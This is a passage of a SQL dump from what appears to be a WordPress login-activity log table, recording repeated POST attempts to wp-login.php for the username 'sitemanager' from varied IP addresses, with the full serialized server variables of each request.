00:00:00'),(94401,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57386\";s:11:\"REMOTE_ADDR\";s:13:\"190.92.174.31\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745964020.1019199;s:12:\"REQUEST_TIME\";i:1745964020;}}','190.92.174.31',0,'2025-04-30 03:30:21','1970-01-01 00:00:00'),(94402,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44174\";s:11:\"REMOTE_ADDR\";s:14:\"209.97.131.236\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745964327.0570011;s:12:\"REQUEST_TIME\";i:1745964327;}}','209.97.131.236',0,'2025-04-30 03:35:28','1970-01-01 00:00:00'),(94403,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44216\";s:11:\"REMOTE_ADDR\";s:14:\"212.227.26.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745964637.44399;s:12:\"REQUEST_TIME\";i:1745964637;}}','212.227.26.126',0,'2025-04-30 03:40:39','1970-01-01 00:00:00'),(94404,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54050\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.141.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745964949.1121669;s:12:\"REQUEST_TIME\";i:1745964949;}}','66.29.141.17',0,'2025-04-30 03:45:50','1970-01-01 00:00:00'),(94405,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40762\";s:11:\"REMOTE_ADDR\";s:12:\"162.0.232.99\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745965267.5734711;s:12:\"REQUEST_TIME\";i:1745965267;}}','162.0.232.99',0,'2025-04-30 03:51:09','1970-01-01 00:00:00'),(94406,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43192\";s:11:\"REMOTE_ADDR\";s:15:\"195.214.235.120\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745965871.7630529;s:12:\"REQUEST_TIME\";i:1745965871;}}','195.214.235.120',0,'2025-04-30 04:01:13','1970-01-01 00:00:00'),(94407,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48412\";s:11:\"REMOTE_ADDR\";s:14:\"185.232.41.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745966176.990737;s:12:\"REQUEST_TIME\";i:1745966176;}}','185.232.41.148',0,'2025-04-30 04:06:18','1970-01-01 00:00:00'),(94408,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41322\";s:11:\"REMOTE_ADDR\";s:14:\"195.26.245.159\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745966482.981123;s:12:\"REQUEST_TIME\";i:1745966482;}}','195.26.245.159',0,'2025-04-30 04:11:24','1970-01-01 00:00:00'),(94409,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"15416\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745966789.417968;s:12:\"REQUEST_TIME\";i:1745966789;}}','91.151.95.70',0,'2025-04-30 04:16:31','1970-01-01 00:00:00'),(94410,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45236\";s:11:\"REMOTE_ADDR\";s:14:\"103.191.76.181\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745967088.1218009;s:12:\"REQUEST_TIME\";i:1745967088;}}','103.191.76.181',0,'2025-04-30 04:21:29','1970-01-01 00:00:00'),(94411,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59546\";s:11:\"REMOTE_ADDR\";s:13:\"81.181.254.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTP